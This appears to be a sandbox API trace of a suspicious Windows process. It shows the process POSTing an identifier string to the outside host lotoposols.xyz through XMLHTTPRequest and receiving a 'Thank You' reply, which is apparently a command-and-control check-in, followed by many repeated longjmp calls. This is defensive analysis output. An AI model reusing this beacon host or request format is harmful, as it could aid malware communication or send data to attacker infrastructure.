	[0192.610] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d8d0 | out: ppvObject=0x26d8d0*=0x0) returned 0x80004002
	[0192.610] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=1, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x26d8a8*(rgvarg=([0]=0x42be18*(varType=0xb, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x420000, varVal2=0x0), [1]=0x42be30*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42da90*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="https://lotoposols.xyz", varVal2=0x0), varVal2=0x0), [2]=0x42be48*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42d958*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="post", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26d8f0, puArgErr=0x26d8c0 | out: pDispParams=0x26d8a8*(rgvarg=([0]=0x42be18*(varType=0xb, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x420000, varVal2=0x0), [1]=0x42be30*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42da90*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="https://lotoposols.xyz", varVal2=0x0), varVal2=0x0), [2]=0x42be48*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42d958*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="post", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26d8f0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d8c0*=0x26dd90) returned 0x0
	[0192.610] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7feff44d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ce18 | out: ppvObject=0x26ce18*=0x0) returned 0x80004002
	[0192.610] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7feff426f70*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ce20 | out: ppvObject=0x26ce20*=0x0) returned 0x80004002
	[0192.610] XMLHTTPRequest:IUnknown:AddRef (This=0x3cacc0) returned 0x2
	[0192.610] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40c8070*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d000 | out: ppvObject=0x26d000*=0x3cacc0) returned 0x0
	[0192.611] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26be20 | out: ppvObject=0x26be20*=0x3cacc0) returned 0x0
	[0192.611] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef40b9ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26be58 | out: ppvObject=0x26be58*=0x0) returned 0x80004002
	[0192.611] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), riid=0x7fef40d0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x26be48 | out: ppvObject=0x26be48*=0x0) returned 0x80004002
	[0192.611] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26be18 | out: ppvObject=0x26be18*=0x0) returned 0x80004002
	[0192.611] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26be18 | out: ppvObject=0x26be18*=0x0) returned 0x80004002
	[0192.611] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x3
	[0192.611] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40cbbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x26bef8 | out: ppvObject=0x26bef8*=0x0) returned 0x80004002
	[0192.611] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08c0*(Data1=0x118, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26bf08 | out: ppvObject=0x26bf08*=0x0) returned 0x80004002
	[0192.611] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26bef0 | out: ppvObject=0x26bef0*=0x3cacc0) returned 0x0
	[0192.611] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef40b9ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26bf20 | out: ppvObject=0x26bf20*=0x0) returned 0x80004002
	[0192.611] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40cbbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x26bef8 | out: ppvObject=0x26bef8*=0x0) returned 0x80004002
	[0192.611] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26bf00 | out: ppvObject=0x26bf00*=0x0) returned 0x80004002
	[0192.611] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26bf00 | out: ppvObject=0x26bf00*=0x0) returned 0x80004002
	[0192.611] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x3
	[0192.611] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0192.611] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26d018 | out: ppvObject=0x26d018*=0x3cacc0) returned 0x0
	[0192.612] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), ppvObject=0x26d010 | out: ppvObject=0x26d010*=0x0) returned 0x80004002
	[0192.612] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0192.612] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x1
	[0192.612] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26dbf0 | out: ppvObject=0x26dbf0*=0x0) returned 0x80004002
	[0192.612] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26dd90*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26db44 | out: rgDispId=0x26db44*=5) returned 0x0
	[0192.612] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x2
	[0192.612] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d8d0 | out: ppvObject=0x26d8d0*=0x0) returned 0x80004002
	[0192.612] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=5, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x26d8a8*(rgvarg=([0]=0x42be48*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42d9c0*(varType=0x8, wReserved1=0xa, wReserved2=0x0, wReserved3=0x0, varVal1="u=4565&id=plis&k=4565&u=4565", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26d8f0, puArgErr=0x26d8c0 | out: pDispParams=0x26d8a8*(rgvarg=([0]=0x42be48*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42d9c0*(varType=0x8, wReserved1=0xa, wReserved2=0x0, wReserved3=0x0, varVal1="u=4565&id=plis&k=4565&u=4565", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26d8f0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d8c0*=0x26dd90) returned 0x0
	[0192.612] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26cf48 | out: ppvObject=0x26cf48*=0x3cacc0) returned 0x0
	[0192.613] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7feff837e20*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x7feff837e20*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x5a62348 | out: ppvObject=0x5a62348*=0x0) returned 0x80004002
	[0192.613] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0192.613] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26ba48 | out: ppvObject=0x26ba48*=0x3cacc0) returned 0x0
	[0192.613] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7feff83f170*(Data1=0x4f9f9fcb, Data2=0xe0f4, Data3=0x48eb, Data4=([0]=0xb7, [1]=0xab, [2]=0xfa, [3]=0x2e, [4]=0xa9, [5]=0x36, [6]=0x5c, [7]=0xb4)), riid=0x7feff83f170*(Data1=0x4f9f9fcb, Data2=0xe0f4, Data3=0x48eb, Data4=([0]=0xb7, [1]=0xab, [2]=0xfa, [3]=0x2e, [4]=0xa9, [5]=0x36, [6]=0x5c, [7]=0xb4)), ppvObject=0x5a41bf8 | out: ppvObject=0x5a41bf8*=0x0) returned 0x80004002
	[0192.613] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0202.678] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x1
	[0202.678] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26dbf8 | out: ppvObject=0x26dbf8*=0x0) returned 0x80004002
	[0202.679] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26dd10*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26db4c | out: rgDispId=0x26db4c*=10) returned 0x0
	[0202.679] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x2
	[0202.679] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d8d0 | out: ppvObject=0x26d8d0*=0x0) returned 0x80004002
	[0202.679] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=10, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x26d8a8*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be60, pExcepInfo=0x26d8f0, puArgErr=0x26d8c0 | out: pDispParams=0x26d8a8*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be60*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="'Thank You: 0210343", varVal2=0x0), pExcepInfo=0x26d8f0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d8c0*=0x26dd90) returned 0x0
	[0202.679] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x1
	[0202.679] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d4a8 | out: ppvObject=0x26d4a8*=0x0) returned 0x80004002
	[0202.680] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26d5c0*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26d3fc | out: rgDispId=0x26d3fc*=7) returned 0x0
	[0202.680] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x3
	[0202.680] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d180 | out: ppvObject=0x26d180*=0x0) returned 0x80004002
	[0202.680] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=7, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x26d158*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be18, pExcepInfo=0x26d1a0, puArgErr=0x26d170 | out: pDispParams=0x26d158*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be18*(varType=0x3, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xc8, varVal2=0x0), pExcepInfo=0x26d1a0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d170*=0x0) returned 0x0
	[0202.680] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x2
	[0202.681] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0202.681] malloc (_Size=0xb0) returned 0x42e060
	[0202.683] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d4a8 | out: ppvObject=0x26d4a8*=0x0) returned 0x80004002
	[0202.683] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26d5c0*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26d3fc | out: rgDispId=0x26d3fc*=7) returned 0x0
	[0202.683] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x3
	[0202.683] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d180 | out: ppvObject=0x26d180*=0x0) returned 0x80004002
	[0202.683] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=7, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x26d158*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be18, pExcepInfo=0x26d1a0, puArgErr=0x26d170 | out: pDispParams=0x26d158*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be18*(varType=0x3, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xc8, varVal2=0x0), pExcepInfo=0x26d1a0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d170*=0xffffffff) returned 0x0
	[0202.683] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x2
	[0202.683] GetTickCount () returned 0x11681fc
	[0202.684] GetTickCount () returned 0x11681fc
	[0202.684] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x1
	[0202.684] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x0
	[0202.684] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0202.686] longjmp () 
	[0202.687] longjmp () 
	[0202.687] longjmp () 
	[0202.687] GetCurrentThreadId () returned 0x9a8
	[0202.687] GetCurrentThreadId () returned 0x9a8
	[0202.687] ??2@YAPEAX_K@Z () returned 0x3e4000
	[0202.687] malloc (_Size=0x80) returned 0x3c88b0
	[0202.687] longjmp () 
	[0202.688] longjmp () 
	[0202.688] longjmp () 
	[0202.688] longjmp () 
	[0202.688] longjmp () 
	[0202.688] longjmp () 
	[0202.689] longjmp () 
	[0202.689] longjmp () 
	[0202.689] longjmp () 
	[0202.689] longjmp () 
	[0202.689] longjmp () 
	[0202.690] longjmp () 
	[0202.690] longjmp () 
	[0202.690] longjmp () 
	[0202.690] longjmp () 
	[0202.690] longjmp () 
	[0202.690] longjmp () 
	[0202.691] longjmp () 
	[0202.691] longjmp () 
	[0202.691] longjmp () 
	[0202.691] longjmp () 
	[0202.692] GetTickCount () returned 0x116820c
	[0202.692] longjmp () 
	[0202.692] longjmp () 
	[0202.692] longjmp () 
	[0202.692] longjmp () 
	[0202.693] longjmp () 
	[0202.693] longjmp () 
	[0202.693] longjmp () 
	[0202.693] longjmp () 
	[0202.693] longjmp () 
	[0202.694] longjmp () 
	[0202.694] longjmp () 
	[0202.694] longjmp () 
	[0202.694] longjmp () 
	[0202.694] longjmp () 
	[0202.694] longjmp () 
	[0202.695] longjmp () 
	[0202.695] longjmp () 
	[0202.695] longjmp () 
	[0202.695] longjmp () 
	[0202.695] longjmp () 
	[0202.696] longjmp () 
	[0202.696] longjmp () 
	[0202.696] longjmp () 
	[0202.696] longjmp () 
	[0202.696] longjmp () 
	[0202.697] longjmp () 
	[0202.697] longjmp () 
	[0202.697] longjmp () 
	[0202.697] longjmp () 
	[0202.697] longjmp () 
	[0202.697] longjmp () 
	[0202.698] longjmp () 
	[0202.698] GetTickCount () returned 0x116820c
	[0202.698] longjmp () 
	[0202.698] longjmp () 
	[0202.698] longjmp () 
	[0202.698] longjmp () 
	[0202.699] longjmp () 
	[0202.699] longjmp () 
	[0202.699] longjmp () 
	[0202.699] longjmp () 
	[0202.699] longjmp () 
	[0202.700] longjmp () 
	[0202.700] longjmp () 
	[0202.700] longjmp () 
	[0202.700] longjmp () 
	[0202.700] longjmp () 
	[0202.701] longjmp () 
	[0202.701] longjmp () 
	[0202.701] longjmp () 
	[0202.701] longjmp () 
	[0202.701] longjmp () 
	[0202.701] longjmp () 
	[0202.702] longjmp () 
	[0202.702] longjmp () 
	[0202.702] longjmp () 
	[0202.702] longjmp () 
	[0202.702] longjmp () 
	[0202.703] longjmp () 
	[0202.703] longjmp () 
	[0202.703] longjmp () 
	[0202.703] longjmp () 
	[0202.703] longjmp () 
	[0202.704] longjmp () 
	[0202.704] longjmp () 
	[0202.704] GetTickCount () returned 0x116820c
	[0202.704] longjmp () 
	[0202.704] longjmp () 
	[0202.704] longjmp () 
	[0202.705] longjmp () 
	[0202.705] longjmp () 
	[0202.705] longjmp () 
	[0202.705] longjmp () 
	[0202.705] longjmp () 
	[0202.706] longjmp () 
	[0202.706] longjmp () 
	[0202.706] longjmp () 
	[0202.706] longjmp () 
	[0202.706] longjmp () 
	[0202.707] longjmp () 
	[0202.707] longjmp () 
	[0202.707] longjmp () 
	[0202.708] longjmp () 
	[0202.708] longjmp () 
	[0202.708] longjmp () 
	[0202.708] longjmp () 
	[0202.708] longjmp () 
	[0202.709] longjmp () 
	[0202.709] longjmp () 
	[0202.709] longjmp () 
	[0202.709] longjmp () 
	[0202.709] longjmp () 
	[0202.710] longjmp () 
	[0202.710] longjmp () 
	[0202.710] longjmp () 
	[0202.710] longjmp () 
	[0202.710] longjmp () 
	[0202.711] longjmp () 
	[0202.711] GetTickCount () returned 0x116821c
	[0202.711] longjmp () 
	[0202.711] longjmp () 
	[0202.711] longjmp () 
	[0202.711] longjmp () 
	[0202.712] longjmp () 
	[0202.712] longjmp () 
	[0202.712] longjmp () 
	[0202.712] longjmp () 
	[0202.713] longjmp () 
	[0202.713] longjmp () 
	[0202.713] longjmp () 
	[0202.713] longjmp () 
	[0202.713] longjmp () 
	[0202.714] longjmp () 
	[0202.714] longjmp () 
